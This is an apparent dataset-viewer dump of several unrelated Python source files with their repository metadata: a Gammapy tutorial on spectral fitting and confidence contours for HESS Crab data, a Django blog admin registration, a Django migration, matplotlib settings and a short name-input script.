rcParams['legend.frameon'] = False
rcParams['figure.figsize'] = (8.0, 5.0)
rcParams['figure.dpi'] = 200
rcParams['savefig.dpi'] = 200
rcParams['savefig.bbox'] = 'tight'
|
[
"[email protected]"
] | |
77d1a721f114372350581d34c782000e12e28616
|
3806175fcbc4a386bea986dfb97a362fb983862f
|
/blog/admin.py
|
b067606aa8033d6bc2cc3041330821fe31e22b76
|
[] |
no_license
|
Kiki-demo/MyBlog
|
c53cbcbae1b3280da74d1d349ff6cc717a79b332
|
51554c92ac5435a7bc2222deedf7aa397c0bd73a
|
refs/heads/master
| 2023-03-28T06:08:10.164174 | 2019-08-02T10:25:20 | 2019-08-02T10:25:20 | 199,954,653 | 0 | 0 | null | 2021-03-29T20:10:39 | 2019-08-01T01:34:14 |
CSS
|
GB18030
|
Python
| false | false | 441 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
# Register your models here.
from .models import Category, Tag, Post
class PostAdmin(admin.ModelAdmin):
list_display = ['title', 'created_time', 'modified_time', 'category', 'author']
# 把新增的 PostAdmin 也注册进来
admin.site.register(Post, PostAdmin)
admin.site.register(Category)
admin.site.register(Tag)
|
[
"[email protected]"
] | |
a4d250d72f94be4c124927e70b0c139ad9f85f9d
|
f8fbf0b0cc919d7d4d7c79532cc5434552d75eb8
|
/docs/0.18.1/_static/notebooks/modeling.py
|
a5bdb272476813045d22aca2f06eddfb47942841
|
[] |
no_license
|
adonath/gammapy-docs
|
ae8571c6aa76d231ac54c93fb3c8968f9f79993b
|
32b605d623abdcd2e82c30bcbf07ef30d259783a
|
refs/heads/main
| 2023-02-25T05:24:53.211005 | 2022-10-13T00:09:12 | 2022-10-13T00:11:33 | 550,476,516 | 0 | 0 | null | 2022-10-12T20:45:50 | 2022-10-12T20:45:49 | null |
UTF-8
|
Python
| false | false | 14,807 |
py
|
#!/usr/bin/env python
# coding: utf-8
# # Modeling and fitting
#
#
# ## Prerequisites
#
# - Knowledge of spectral analysis to produce 1D On-Off datasets, [see the following tutorial](spectrum_analysis.ipynb)
# - Reading of pre-computed datasets [see the MWL tutorial](analysis_mwl.ipynb)
# - General knowledge on statistics and optimization methods
#
# ## Proposed approach
#
# This is a hands-on tutorial to `~gammapy.modeling`, showing how the model, dataset and fit classes work together. As an example we are going to work with HESS data of the Crab Nebula and show in particular how to :
# - perform a spectral analysis
# - use different fitting backends
# - acces covariance matrix informations and parameter errors
# - compute likelihood profile
# - compute confidence contours
#
# See also: [Models gallery tutorial](models.ipynb) and `docs/modeling/index.rst`.
#
#
# ## The setup
# In[ ]:
import numpy as np
from astropy import units as u
import matplotlib.pyplot as plt
import scipy.stats as st
from gammapy.modeling import Fit
from gammapy.datasets import Datasets, SpectrumDatasetOnOff
from gammapy.modeling.models import LogParabolaSpectralModel, SkyModel
from gammapy.visualization.utils import plot_contour_line
from itertools import combinations
# ## Model and dataset
#
# First we define the source model, here we need only a spectral model for which we choose a log-parabola
# In[ ]:
crab_spectrum = LogParabolaSpectralModel(
amplitude=1e-11 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
alpha=2.3,
beta=0.2,
)
crab_spectrum.alpha.max = 3
crab_spectrum.alpha.min = 1
crab_model = SkyModel(spectral_model=crab_spectrum, name="crab")
# The data and background are read from pre-computed ON/OFF datasets of HESS observations, for simplicity we stack them together.
# Then we set the model and fit range to the resulting dataset.
# In[ ]:
datasets = []
for obs_id in [23523, 23526]:
dataset = SpectrumDatasetOnOff.from_ogip_files(
f"$GAMMAPY_DATA/joint-crab/spectra/hess/pha_obs{obs_id}.fits"
)
datasets.append(dataset)
dataset_hess = Datasets(datasets).stack_reduce(name="HESS")
# Set model and fit range
dataset_hess.models = crab_model
e_min = 0.66 * u.TeV
e_max = 30 * u.TeV
dataset_hess.mask_fit = dataset_hess.counts.geom.energy_mask(e_min, e_max)
# ## Fitting options
#
#
#
# First let's create a `Fit` instance:
# In[ ]:
fit = Fit([dataset_hess], store_trace=True)
# By default the fit is performed using MINUIT, you can select alternative optimizers and set their option using the `optimize_opts` argument of the `Fit.run()` method. In addition we have specified to store the trace of parameter values of the fit.
#
# Note that, for now, covaraince matrix and errors are computed only for the fitting with MINUIT. However depending on the problem other optimizers can better perform, so somethimes it can be usefull to run a pre-fit with alternative optimization methods.
#
# For the "scipy" backend the available options are desribed in detail here:
# https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.minimize.html
# In[ ]:
get_ipython().run_cell_magic('time', '', 'scipy_opts = {"method": "L-BFGS-B", "options": {"ftol": 1e-4, "gtol": 1e-05}}\nresult_scipy = fit.run(backend="scipy", optimize_opts=scipy_opts)')
# For the "sherpa" backend you can choose the optimization algorithm between method = {"simplex", "levmar", "moncar", "gridsearch"}.
# Those methods are described and compared in detail on http://cxc.cfa.harvard.edu/sherpa/methods/index.html.
# The available options of the optimization methods are described on the following page https://cxc.cfa.harvard.edu/sherpa/methods/opt_methods.html
# In[ ]:
get_ipython().run_cell_magic('time', '', 'sherpa_opts = {"method": "simplex", "ftol": 1e-3, "maxfev": int(1e4)}\nresults_simplex = fit.run(backend="sherpa", optimize_opts=sherpa_opts)')
# For the "minuit" backend see https://iminuit.readthedocs.io/en/latest/reference.html for a detailed description of the available options. If there is an entry ‘migrad_opts’, those options will be passed to [iminuit.Minuit.migrad](https://iminuit.readthedocs.io/en/latest/reference.html#iminuit.Minuit.migrad). Additionnaly you can set the fit tolerance using the [tol](https://iminuit.readthedocs.io/en/latest/reference.html#iminuit.Minuit.tol
# ) option. The minimization will stop when the estimated distance to the minimum is less than 0.001*tol (by default tol=0.1). The [strategy](https://iminuit.readthedocs.io/en/latest/reference.html#iminuit.Minuit.strategy) option change the speed and accuracy of the optimizer: 0 fast, 1 default, 2 slow but accurate. If you want more reliable error estimates, you should run the final fit with strategy 2.
#
# In[ ]:
get_ipython().run_cell_magic('time', '', 'minuit_opts = {"tol": 0.001, "strategy": 1}\nresult_minuit = fit.run(backend="minuit", optimize_opts=minuit_opts)')
# ## Fit quality assessment
#
# There are various ways to check the convergence and quality of a fit. Among them:
#
# - Refer to the automatically-generated results dictionary
# In[ ]:
print(result_scipy)
# In[ ]:
print(results_simplex)
# In[ ]:
print(result_minuit)
# - Check the trace of the fit e.g. in case the fit did not converge properly
# In[ ]:
result_minuit.trace
# - Check that the fitted values and errors for all parameters are reasonable, and no fitted parameter value is "too close" - or even outside - its allowed min-max range
# In[ ]:
result_minuit.parameters.to_table()
# - Plot fit statistic profiles for all fitted prameters, using `~gammapy.modeling.Fit.stat_profile()`. For a good fit and error estimate each profile should be parabolic
# In[ ]:
total_stat = result_minuit.total_stat
for par in dataset_hess.models.parameters:
if par.frozen is False:
profile = fit.stat_profile(parameter=par)
plt.plot(
profile[f"{par.name}_scan"], profile["stat_scan"] - total_stat
)
plt.xlabel(f"{par.unit}")
plt.ylabel("Delta TS")
plt.title(f"{par.name}: {par.value} +- {par.error}")
plt.show()
plt.close()
# - Inspect model residuals. Those can always be accessed using `~Dataset.residuals()`, that will return an array in case a the fitted `Dataset` is a `SpectrumDataset` and a full cube in case of a `MapDataset`. For more details, we refer here to the dedicated fitting tutorials: [analysis_3d.ipynb](analysis_3d.ipynb) (for `MapDataset` fitting) and [spectrum_analysis.ipynb](spectrum_analysis.ipynb) (for `SpectrumDataset` fitting).
# ## Covariance and parameters errors
#
# After the fit the covariance matrix is attached to the model. You can get the error on a specific parameter by accessing the `.error` attribute:
# In[ ]:
crab_model.spectral_model.alpha.error
# As an example, this step is needed to produce a butterfly plot showing the envelope of the model taking into account parameter uncertainties.
# In[ ]:
energy_range = [1, 10] * u.TeV
crab_spectrum.plot(energy_range=energy_range, energy_power=2)
ax = crab_spectrum.plot_error(energy_range=energy_range, energy_power=2)
# ## Confidence contours
#
#
# In most studies, one wishes to estimate parameters distribution using observed sample data.
# A 1-dimensional confidence interval gives an estimated range of values which is likely to include an unknown parameter.
# A confidence contour is a 2-dimensional generalization of a confidence interval, often represented as an ellipsoid around the best-fit value.
#
# Gammapy offers two ways of computing confidence contours, in the dedicated methods `Fit.minos_contour()` and `Fit.stat_profile()`. In the following sections we will describe them.
# An important point to keep in mind is: *what does a $N\sigma$ confidence contour really mean?* The answer is it represents the points of the parameter space for which the model likelihood is $N\sigma$ above the minimum. But one always has to keep in mind that **1 standard deviation in two dimensions has a smaller coverage probability than 68%**, and similarly for all other levels. In particular, in 2-dimensions the probability enclosed by the $N\sigma$ confidence contour is $P(N)=1-e^{-N^2/2}$.
# ### Computing contours using `Fit.minos_contour()`
# After the fit, MINUIT offers the possibility to compute the confidence confours.
# gammapy provides an interface to this functionnality throught the `Fit` object using the `minos_contour` method.
# Here we defined a function to automatize the contour production for the differents parameterer and confidence levels (expressed in term of sigma):
# In[ ]:
def make_contours(fit, result, npoints, sigmas):
cts_sigma = []
for sigma in sigmas:
contours = dict()
for par_1, par_2 in combinations(["alpha", "beta", "amplitude"], r=2):
contour = fit.minos_contour(
result.parameters[par_1],
result.parameters[par_2],
numpoints=npoints,
sigma=sigma,
)
contours[f"contour_{par_1}_{par_2}"] = {
par_1: contour[par_1].tolist(),
par_2: contour[par_2].tolist(),
}
cts_sigma.append(contours)
return cts_sigma
# Now we can compute few contours.
# In[ ]:
get_ipython().run_cell_magic('time', '', 'sigma = [1, 2]\ncts_sigma = make_contours(fit, result_minuit, 10, sigma)')
# Then we prepare some aliases and annotations in order to make the plotting nicer.
# In[ ]:
pars = {
"phi": r"$\phi_0 \,/\,(10^{-11}\,{\rm TeV}^{-1} \, {\rm cm}^{-2} {\rm s}^{-1})$",
"alpha": r"$\alpha$",
"beta": r"$\beta$",
}
panels = [
{
"x": "alpha",
"y": "phi",
"cx": (lambda ct: ct["contour_alpha_amplitude"]["alpha"]),
"cy": (
lambda ct: np.array(1e11)
* ct["contour_alpha_amplitude"]["amplitude"]
),
},
{
"x": "beta",
"y": "phi",
"cx": (lambda ct: ct["contour_beta_amplitude"]["beta"]),
"cy": (
lambda ct: np.array(1e11)
* ct["contour_beta_amplitude"]["amplitude"]
),
},
{
"x": "alpha",
"y": "beta",
"cx": (lambda ct: ct["contour_alpha_beta"]["alpha"]),
"cy": (lambda ct: ct["contour_alpha_beta"]["beta"]),
},
]
# Finally we produce the confidence contours figures.
# In[ ]:
fig, axes = plt.subplots(1, 3, figsize=(16, 5))
colors = ["m", "b", "c"]
for p, ax in zip(panels, axes):
xlabel = pars[p["x"]]
ylabel = pars[p["y"]]
for ks in range(len(cts_sigma)):
plot_contour_line(
ax,
p["cx"](cts_sigma[ks]),
p["cy"](cts_sigma[ks]),
lw=2.5,
color=colors[ks],
label=f"{sigma[ks]}" + r"$\sigma$",
)
ax.set_xlabel(xlabel)
ax.set_ylabel(ylabel)
plt.legend()
plt.tight_layout()
# ### Computing contours using `Fit.stat_surface()`
# This alternative method for the computation of confidence contours, although more time consuming than `Fit.minos_contour()`, is expected to be more stable. It consists of a generalization of `Fit.stat_profile()` to a 2-dimensional parameter space. The algorithm is very simple:
# - First, passing two arrays of parameters values, a 2-dimensional discrete parameter space is defined;
# - For each node of the parameter space, the two parameters of interest are frozen. This way, a likelihood value ($-2\mathrm{ln}\,\mathcal{L}$, actually) is computed, by either freezing (default) or fitting all nuisance parameters;
# - Finally, a 2-dimensional surface of $-2\mathrm{ln}(\mathcal{L})$ values is returned.
# Using that surface, one can easily compute a surface of $TS = -2\Delta\mathrm{ln}(\mathcal{L})$ and compute confidence contours.
#
# Let's see it step by step.
# First of all, we can notice that this method is "backend-agnostic", meaning that it can be run with MINUIT, sherpa or scipy as fitting tools. Here we will stick with MINUIT, which is the default choice:
# In[ ]:
optimize_opts = {"backend": "minuit", "print_level": 0}
# As an example, we can compute the confidence contour for the `alpha` and `beta` parameters of the `dataset_hess`. Here we define the parameter space:
# In[ ]:
result = result_minuit
par_1 = result.parameters["alpha"]
par_2 = result.parameters["beta"]
x = par_1
y = par_2
x_values = np.linspace(1.55, 2.7, 20)
y_values = np.linspace(-0.05, 0.55, 20)
# Then we run the algorithm, by choosing `reoptimize=False` for the sake of time saving. In real life applications, we strongly recommend to use `reoptimize=True`, so that all free nuisance parameters will be fit at each grid node. This is the correct way, statistically speaking, of computing confidence contours, but is expected to be time consuming.
# In[ ]:
stat_surface = fit.stat_surface(
x, y, x_values, y_values, reoptimize=False, **optimize_opts
)
# In order to easily inspect the results, we can convert the $-2\mathrm{ln}(\mathcal{L})$ surface to a surface of statistical significance (in units of Gaussian standard deviations from the surface minimum):
# In[ ]:
# Compute TS
TS = stat_surface["stat_scan"] - result.total_stat
# In[ ]:
# Compute the corresponding statistical significance surface
gaussian_sigmas = np.sqrt(TS.T)
# Notice that, as explained before, $1\sigma$ contour obtained this way will not contain 68% of the probability, but rather
# In[ ]:
# Compute the corresponding statistical significance surface
# p_value = 1 - st.chi2(df=1).cdf(TS)
# gaussian_sigmas = st.norm.isf(p_value / 2).T
# Finally, we can plot the surface values together with contours:
# In[ ]:
fig, ax = plt.subplots(figsize=(8, 6))
# We choose to plot 1 and 2 sigma confidence contours
levels = [1, 2]
contours = plt.contour(gaussian_sigmas, levels=levels, colors="white")
plt.clabel(contours, fmt="%.0f$\,\sigma$", inline=3, fontsize=15)
im = plt.imshow(
gaussian_sigmas,
extent=[0, len(x_values) - 1, 0, len(y_values) - 1],
origin="lower",
)
fig.colorbar(im)
plt.xticks(range(len(x_values)), np.around(x_values, decimals=2), rotation=45)
plt.yticks(range(len(y_values)), np.around(y_values, decimals=2));
# Note that, if computed with `reoptimize=True`, this plot would be completely consistent with the third panel of the plot produced with `Fit.minos_contour` (try!).
# Finally, it is always remember that confidence contours are approximations. In particular, when the parameter range boundaries are close to the contours lines, it is expected that the statistical meaning of the countours is not well defined. That's why we advise to always choose a parameter space that com contain the contours you're interested in.
# In[ ]:
|
[
"[email protected]"
] | |
4c9df0aef998f4392465ebfdb2da7513c530cef6
|
5cb820487419a5e06345590f5f563a09e1949b42
|
/F0003a.py
|
03fccecf0051f01d2f97c39f5355f20102edf0fe
|
[] |
no_license
|
loczylevi/-f0003
|
a84921d0d07dcc3e27e48b18f1e031d9f3dc73e8
|
12ed7125fd0700d8b777c0985c70144335007423
|
refs/heads/master
| 2023-01-11T23:01:45.050216 | 2020-11-08T10:30:43 | 2020-11-08T10:30:43 | 310,523,895 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 134 |
py
|
vezetéknév = input('Mi a vezetékneved?')
keresztnév = input('MI a keresztneved?')
print('A te neved ', vezetéknév, keresztnév,)
|
[
"[email protected]"
] | |
025e7c2fd0563d6420b77dde0117743c67a0e7a4
|
1578ce4b2961a0b89b7fac47e9063acaced21b4c
|
/address/migrations/0002_address_customer.py
|
279c38da990f0df58c68a7d18957b0fcedd9135e
|
[] |
no_license
|
mrpyrex/epytech
|
8125c50b7274ec8511d0677f33b0569ebc5472b5
|
e511cdecc8b554f65ed135b9ac6d312c278fc873
|
refs/heads/master
| 2020-07-20T10:40:17.001431 | 2019-09-11T20:38:42 | 2019-09-11T20:38:42 | 206,624,763 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 616 |
py
|
# Generated by Django 2.1.7 on 2019-09-04 07:21
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('address', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='address',
name='customer',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
]
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.